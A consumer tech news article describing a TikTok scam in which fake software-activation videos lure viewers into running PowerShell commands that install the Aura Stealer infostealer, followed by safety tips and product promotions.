TikTok malware scam tricks you with fake activation guides

NEWNow you can listen to News articles!

Cybercriminals are once again turning TikTok into a trap for unsuspecting users. This time, they are disguising malicious downloads as free activation guides for popular software like Windows, Microsoft 365, Photoshop, and even fake versions of Netflix and Spotify Premium.

Security expert Xavier Mertens was the first to spot the campaign and confirmed that the same type of scheme had been seen earlier this year. According to BleepingComputer, these fake TikTok videos show short PowerShell commands and instruct viewers to run them as administrators to “activate” or “fix” their programs.

In reality, those commands connect to a malicious website and attract malware known as Aura Stealer, which silently extracts saved passwords, cookies, cryptocurrency wallets, and authentication tokens from the victim’s computer.

Sign up to receive my FREE CyberGuy report
Get my best tech tips, urgent security alerts, and exclusive offers delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Guide to Surviving Scams, free when you join me CYBERGUY.COM information sheet.

OVER 3000 YOUTUBE VIDEOS DELIVERY MALWARE DISGUISED AS FREE SOFTWARE

Cybercriminals use fake TikTok videos to trick users into downloading malware disguised as free activation guides. (Kurt “CyberGuy” Knutsson)

How the TikTok scam works

This campaign uses what experts call a ClickFix attack. It is a social engineering trick that makes victims feel like they are following legitimate technological instructions. The instructions seem quick and easy: run a short command and get instant access to the premium software.

But instead of activating anything, the PowerShell command connects to a remote domain called slmgr[.]win, which downloads harmful executables from pages hosted on Cloudflare. The main file, updater.exe, is a variant of the Aura Stealer malware. Once inside the system, it looks for your credentials and sends them back to the attacker.

Another file, source.exe, uses Microsoft’s C# compiler to run code directly in memory, making it even harder to detect. The purpose of this additional payload is not yet fully known, but the pattern follows previous malware used for cryptocurrency theft and ransomware delivery.

META ACCOUNT SUSPENSION SCAM HIDDEN MALWARE FILEFIX

Person holding his phone and accessing TikTok.

Those short “activation” commands secretly connect to malicious servers that install information-stealing malware like Aura Stealer. (Kurt “CyberGuy” Knutsson)

How to stay safe from TikTok malware scams

Although these scams seem convincing, you can avoid becoming a victim by taking the right precautions.

1) Avoid shortcuts

Never copy or run PowerShell commands from TikTok videos or random websites. If something promises free access to premium software, it’s probably a scam.

2) Use trusted sources

Always download or activate the software directly from the official website or through legitimate app stores.

3) Keep security tools updated

Antiviruses or outdated browsers cannot detect the latest threats. Update your software regularly to stay protected.

4) Use powerful antivirus software

Install powerful antivirus software that offers real-time scanning and protection against Trojans, data stealers, and phishing attempts.

The best way to protect yourself from malicious links that install malware and potentially access your private information is to have powerful antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe.

Get my picks for the best antivirus protection winners of 2025 for your Windows, Mac, Android, and iOS devices at Cyberguy.com

5) Sign up for a data deletion service

If your personal data ends up on the dark web, a data monitoring or deletion service can alert you and help you remove sensitive information.

While no service can guarantee complete removal of your data from the Internet, a data deletion service is truly a smart choice. They are not cheap, and neither is your privacy. These services do all the work for you by actively monitoring and systematically deleting your personal information from hundreds of websites. It’s what gives me peace of mind and has proven to be the most effective way to delete your personal data from the Internet. By limiting the information available, you reduce the risk of scammers cross-referencing leak data with information they can find on the dark web, making it harder for them to target you.

Check out my top picks for data removal services and get a free scan to find out if your personal information is already available on the web by visiting Cyberguy.com

Get a free scan to find out if your personal information is already available on the web: Cyberguy.com

6) Reset credentials

If you have ever followed suspicious instructions or entered credentials after watching a “free activation” video, reset all your passwords immediately.

7) Reset passwords

If you have ever followed suspicious instructions or entered credentials after watching a “free activation” video, reset all your passwords immediately. Start with your email, financial, and social media accounts. Use unique passwords for each site. Consider using a password manager, which stores and generates complex passwords securely, reducing the risk of password reuse.

Next, check to see if your email has been exposed in previous breaches. Our number one password manager (see Cyberguy.com) includes a built-in breach scanner that checks to see if your email address or passwords have appeared in known breaches. If you discover a match, immediately change any reused passwords and protect those accounts with new, unique credentials.

Check out the best expert-reviewed password managers of 2025 at Cyberguy.com

8) Enable multi-factor authentication

Add an extra layer of security by enabling multi-factor authentication whenever possible. Even if your passwords are stolen, attackers won’t be able to log in without your verification.

If you followed suspicious steps, change your passwords, enable two-factor authentication, and stay alert for future scams. (Getty Images)

Kurt’s Key Takeaways

TikTok’s global reach makes it a prime target for scams like this. What seems like a useful trick could end up costing you safety, money, and peace of mind. Stay alert, trust only verified sources, and remember that there is no such thing as a free activation shortcut.

CLICK HERE TO DOWNLOAD THE News APP

Is TikTok doing enough to protect its users from scams like this? Let us know by writing to us at Cyberguy.com

Kurt “CyberGuy” Knutsson is an award-winning technology journalist with a deep love for technology, gear and devices that improve lives with his contributions to News and News Business since mornings on “News & Friends.” Do you have any technical questions? Get Kurt’s free CyberGuy newsletter, share your voice, a story idea or comment on CyberGuy.com.

Breaking News

Trump’s war with Iran causes an increase in the price of gas: enough is enough

Trump’s four- to five-week Iran excursion now appears open

Former Republican strategist predicts misery, humiliation and shame for Donald Trump

Transgender golfer sues LPGA over policy protecting women’s competitions

Boxer Tyson Fury’s father, John Fury, reveals that their relationship “is destroyed”

Conference Commissioner Tim Pernetti Thanks Trump for Army-Navy Game Executive Order

Kentucky survives Santa Clara in overtime thriller after Otega Oweh miracle

Former Yankee Brett Gardner’s Family Files Lawsuit Against Costa Rica Resort After Son’s Death from Carbon Monoxide

Wellness Expert Reveals Surprising Health Benefits of Daily Cold Exposure: ‘Big Difference’

Family calls for help as teen faces life-threatening bone marrow failure